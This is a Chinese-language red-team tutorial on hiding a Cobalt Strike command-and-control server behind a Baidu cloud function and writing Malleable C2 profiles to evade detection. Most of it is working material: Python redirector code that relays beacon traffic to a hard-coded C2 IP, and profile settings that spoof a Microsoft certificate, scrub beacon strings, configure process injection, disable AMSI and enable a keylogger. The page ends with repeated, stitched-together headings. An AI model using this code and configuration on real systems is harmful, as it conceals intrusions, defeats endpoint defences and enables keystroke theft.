云函数利用与Profile混淆技术详解<\/h1>

一、云函数利用技术<\/h2>

1. 云函数概述<\/h3>

云函数(Serverless Cloud Function)是云服务商提供的无服务器执行环境，无需购买和管理服务器即可运行代码。主要服务商包括：<\/p>

阿里云函数计算<\/li>
腾讯云函数<\/li>
华为云函数<\/li>
百度云函数<\/li>
移动云函数<\/li>
天翼云函数<\/li>
字节跳动轻服务<\/li>
AWS Lambda<\/li>
Google Firebase<\/li>

Azure Function<\/li> <\/ul>

2. 利用场景<\/h3>

隐藏上线服务器IP<\/li>

绕过域名白名单限制出网上线<\/li> <\/ol>

3. 百度智能云函数利用实战<\/h3>

第一步：基础配置<\/h4>

注册账号并完成实名认证<\/li>
创建函数，选择"空白函数"<\/li>
函数环境选择Python3<\/li>

配置HTTP触发器：

设置URL路径（需注意CS每次请求路径随机，需做好正则匹配）<\/li>

选择HTTP方法并提交<\/li> <\/ul> <\/li> <\/ol>

第二步：函数代码配置<\/h4>

# -*- coding: utf-8 -*-<\/span>
<\/span><\/span>import<\/span> json,<\/span>requests,<\/span>base64
<\/span><\/span>
<\/span><\/span>def<\/span> handler<\/span>(event, context):
<\/span><\/span>    C2=<\/span>'https:\/\/110.40.213.80:443'<\/span>  # C2服务器地址，可使用HTTP\/HTTPS<\/span>
<\/span><\/span>    path=<\/span>event['path'<\/span>]
<\/span><\/span>    headers=<\/span>event['headers'<\/span>]
<\/span><\/span>    print(event)
<\/span><\/span>    
<\/span><\/span>    if<\/span> event['httpMethod'<\/span>] ==<\/span> 'GET'<\/span>:
<\/span><\/span>        resp=<\/span>requests.<\/span>get(C2+<\/span>path,headers=<\/span>headers,verify=<\/span>False<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        resp=<\/span>requests.<\/span>post(C2+<\/span>path,data=<\/span>event['body'<\/span>],headers=<\/span>headers,verify=<\/span>False<\/span>)
<\/span><\/span>        print(resp.<\/span>headers)
<\/span><\/span>        print(resp.<\/span>content)
<\/span><\/span>    
<\/span><\/span>    response=<\/span>{
<\/span><\/span>        "isBase64Encoded"<\/span>: True<\/span>,
<\/span><\/span>        "statusCode"<\/span>: resp.<\/span>status_code,
<\/span><\/span>        "headers"<\/span>: dict(resp.<\/span>headers),
<\/span><\/span>        "body"<\/span>: str(base64.<\/span>b64encode(resp.<\/span>content))[2<\/span>:-<\/span>1<\/span>]
<\/span><\/span>    }
<\/span><\/span>    return<\/span> response
<\/span><\/span><\/code><\/pre>关键点说明<\/h4>

触发器域名仅支持HTTPS<\/li>
C2监听器配置需与脚本中的协议、端口一致<\/li>
优势：

绕过域名白名单限制<\/li>
隐藏C2真实IP<\/li>
中间流量仅显示云函数域名<\/li>
<\/ul>
<\/li>
<\/ol>
二、Profile混淆技术<\/h2>
1. Profile概述<\/h3>
Cobalt Strike使用profile配置文件生成Beacon有效负载，通过可延展C2配置文件语言设置值，用于混淆流量和内存。<\/p>
2. 基础模板<\/h3>
# 全局选项
<\/span><\/span><\/span><\/span>set sleeptime "10000"<\/span>;     #<\/span> 睡眠时间<\/span>(ms)
<\/span><\/span>set jitter "0"<\/span>;           #<\/span> 睡眠抖动时间<\/span>(0<\/span>-<\/span>99<\/span>%<\/span>)
<\/span><\/span>#set host_stage "false";  # 设置所有Payload为Stageless
<\/span><\/span><\/span><\/span>
<\/span><\/span># SSL证书配置
<\/span><\/span><\/span><\/span>https-<\/span>certificate {
<\/span><\/span>    set C "US"<\/span>;                      #<\/span> 国家代码<\/span>
<\/span><\/span>    set CN "Microsoft IT TLS CA 2"<\/span>;  #<\/span> 通用名称<\/span>
<\/span><\/span>    set L "Redmond"<\/span>;                 #<\/span> 城市<\/span>
<\/span><\/span>    set O "Microsoft Corporation"<\/span>;   #<\/span> 组织<\/span>
<\/span><\/span>    set OU "Microsoft IT"<\/span>;           #<\/span> 组织单位<\/span>
<\/span><\/span>    set ST "Washington"<\/span>;             #<\/span> 州<\/span>\/<\/span>省<\/span>
<\/span><\/span>    set validity "365"<\/span>;              #<\/span> 有效期<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 代码签名
<\/span><\/span><\/span><\/span>code-<\/span>signer{
<\/span><\/span>    set keystore "cobaltstrike1.store"<\/span>; 
<\/span><\/span>    set password "password"<\/span>;
<\/span><\/span>    set alias "certificate"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. HTTP-GET配置<\/h3>
http-<\/span>get {
<\/span><\/span>    set uri "\/login \/config \/admin \/history"<\/span>; #<\/span> 自定义请求路径<\/span>
<\/span><\/span>    
<\/span><\/span>    client {
<\/span><\/span>        header "Accept"<\/span> "*\/*"<\/span>;
<\/span><\/span>        header "Accept-Language"<\/span> "en-US"<\/span>;
<\/span><\/span>        header "Connection"<\/span> "close"<\/span>;
<\/span><\/span>
<\/span><\/span>        metadata {
<\/span><\/span>            netbiosu;           #<\/span> netbios(大写<\/span>)编码<\/span>
<\/span><\/span>            append ".php"<\/span>;      #<\/span> 追加参数尾缀<\/span>
<\/span><\/span>            parameter "file"<\/span>;   #<\/span> 新增<\/span>url参数<\/span>
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    server {
<\/span><\/span>        header "Content-Type"<\/span> "text\/plain"<\/span>;
<\/span><\/span>        output {
<\/span><\/span>            base64;             #<\/span> base64编码<\/span>
<\/span><\/span>            print;              #<\/span> 输出到<\/span>HTTP Body
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. HTTP-POST配置<\/h3>
http-<\/span>post {
<\/span><\/span>    set uri "\/page= \/index="<\/span>;   #<\/span> 不能与<\/span>GET路径相同<\/span>
<\/span><\/span>    
<\/span><\/span>    client {
<\/span><\/span>        header "Accept"<\/span> "*\/*"<\/span>;
<\/span><\/span>        header "Accept-Language"<\/span> "en"<\/span>;
<\/span><\/span>        header "Connection"<\/span> "close"<\/span>;     
<\/span><\/span>        
<\/span><\/span>        id {
<\/span><\/span>            netbios;
<\/span><\/span>            append ".php"<\/span>;
<\/span><\/span>            uri-<\/span>append;         #<\/span> 追加到<\/span>url末尾<\/span>
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        output {
<\/span><\/span>            base64;   
<\/span><\/span>            print;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    server {
<\/span><\/span>        output {
<\/span><\/span>            base64;
<\/span><\/span>            print;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 流量侧分析<\/h3>


Wireshark抓包<\/strong>：<\/p>

DNS流量可见云函数地址<\/li>
可通过请求\/返回包大小区分心跳和行为流量<\/li>
传输内容HTTPS加密<\/li>
<\/ul>
<\/li>

BurpSuite抓包<\/strong>：<\/p>

可看到profile设置的URL、Header等信息<\/li>
指定Cookie字段存放元数据<\/li>
返回包内容与profile配置一致<\/li>
<\/ul>
<\/li>
<\/ol>
6. 主机侧配置<\/h3>
stage标签配置<\/h4>
set userwx "false"<\/span>;        #<\/span> 内存属性，<\/span>false为<\/span>RX
<\/span><\/span>set cleanup "true"<\/span>;       #<\/span> 抹去内存中的反射<\/span>DLL
<\/span><\/span>set sleep_mask "true"<\/span>;     #<\/span> 对数据和代码进行异或加密<\/span>
<\/span><\/span>set stomppe "true"<\/span>;        #<\/span> 混淆<\/span>MZ、<\/span>PE等关键字<\/span>
<\/span><\/span>set obfuscate "true"<\/span>;      #<\/span> 混淆<\/span>DLL导入表、区段名<\/span>
<\/span><\/span>set smartinject "true"<\/span>;    #<\/span> 智能注入，避免异常<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ PE头部混淆
<\/span><\/span><\/span><\/span>set checksum "0"<\/span>;
<\/span><\/span>set compile_time "11 Nov 2014 06:18:30"<\/span>;
<\/span><\/span>set entry_point "650688"<\/span>;
<\/span><\/span>set image_size_x86 "4661248"<\/span>;
<\/span><\/span>set image_size_x64 "4661248"<\/span>;
<\/span><\/span>set name "srv.dll"<\/span>;
<\/span><\/span>set magic_pe "LE"<\/span>;
<\/span><\/span>set rich_header "<\/span>\\<\/span>x3e<\/span>\\<\/span>x98<\/span>\\<\/span>xfe..."<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 替换反射DLL中的固定字符
<\/span><\/span><\/span><\/span>transform-<\/span>x86 {
<\/span><\/span>    prepend "<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90"<\/span>;
<\/span><\/span>    strrep "ReflectiveLoader"<\/span> ""<\/span>;
<\/span><\/span>    strrep "beacon.dll"<\/span> ""<\/span>;
<\/span><\/span>    strrep "This program cannot be run in DOS mode"<\/span> ""<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>process-inject标签<\/h4>
process-<\/span>inject {
<\/span><\/span>    set allocator "VirtualAllocEx"<\/span>;  #<\/span> 远程内存分配技术<\/span>
<\/span><\/span>    set min_alloc "7814"<\/span>;           #<\/span> 最小内存分配值<\/span>
<\/span><\/span>    set userwx "false"<\/span>;             #<\/span> 内存不应具有<\/span>RWX权限<\/span>
<\/span><\/span>    set startrwx "false"<\/span>;           #<\/span> 注入前内存不应<\/span>RWX
<\/span><\/span>
<\/span><\/span>    transform-<\/span>x86 {
<\/span><\/span>        prepend "<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90"<\/span>; #<\/span> NOP指令<\/span>
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    transform-<\/span>x64 {
<\/span><\/span>        prepend "<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90<\/span>\\<\/span>x90"<\/span>; #<\/span> NOP指令<\/span>
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    execute {
<\/span><\/span>        CreateThread "ntdll.dll!RtlUserThreadStart+0x2285"<\/span>;
<\/span><\/span>        NtQueueApcThread-<\/span>s;
<\/span><\/span>        SetThreadContext;
<\/span><\/span>        CreateRemoteThread;
<\/span><\/span>        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"<\/span>;
<\/span><\/span>        RtlCreateUserThread;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>post-ex标签<\/h4>
post-<\/span>ex {
<\/span><\/span>    set spawnto_x86 "%windir%<\/span>\\\\<\/span>syswow64<\/span>\\\\<\/span>svchost.exe"<\/span>;  #<\/span> 32<\/span>位<\/span>payload
<\/span><\/span>    set spawnto_x64 "%windir%<\/span>\\\\<\/span>sysnative<\/span>\\\\<\/span>svchost.exe"<\/span>; #<\/span> 64<\/span>位<\/span>payload
<\/span><\/span>    set obfuscate "true"<\/span>;           #<\/span> 混淆<\/span>post-<\/span>ex DLLs
<\/span><\/span>    set pipename "srvsvc-1-5-5-0####"<\/span>; #<\/span> 命名管道名称<\/span>
<\/span><\/span>    set smartinject "true"<\/span>;         #<\/span> 传递关键函数指针<\/span>
<\/span><\/span>    set amsi_disable "true"<\/span>;         #<\/span> 禁用<\/span>AMSI
<\/span><\/span>    set keylogger "SetWindowsHookEx"<\/span>; #<\/span> 键盘记录方法<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、参考资源<\/h2>

官方profile配置模板：https:\/\/hstechdocs.helpsystems.com\/manuals\/cobaltstrike\/current\/userguide\/content\/topics\/malleable-c2_main.htm#_Toc65482834<\/li>
Malleable C2项目：https:\/\/github.com\/threatexpress\/malleable-c2<\/li>
流量profile配置参考：https:\/\/wbglil.gitbook.io\/cobalt-strike\/cobalt-strikekuo-zhan\/malleable-c2#http-get<\/li>
后渗透标签参考：https:\/\/wbglil.gitbook.io\/cobalt-strike\/cobalt-strikekuo-zhan\/malleable-c2#malleable-pe-process-injection-and-post-exploitationbeacon-hang-wei<\/li>
<\/ol>

云函数利用与Profile混淆技术详解<\/h1>

一、云函数利用技术<\/h2>

3. 百度智能云函数利用实战<\/h3>

二、Profile混淆技术<\/h2>

1. Profile概述<\/h3> Cobalt Strike使用profile配置文件生成Beacon有效负载，通过可延展C2配置文件语言设置值，用于混淆流量和内存。<\/p>

6. 主机侧配置<\/h3>

1. Profile概述<\/h3>
Cobalt Strike使用profile配置文件生成Beacon有效负载，通过可延展C2配置文件语言设置值，用于混淆流量和内存。<\/p>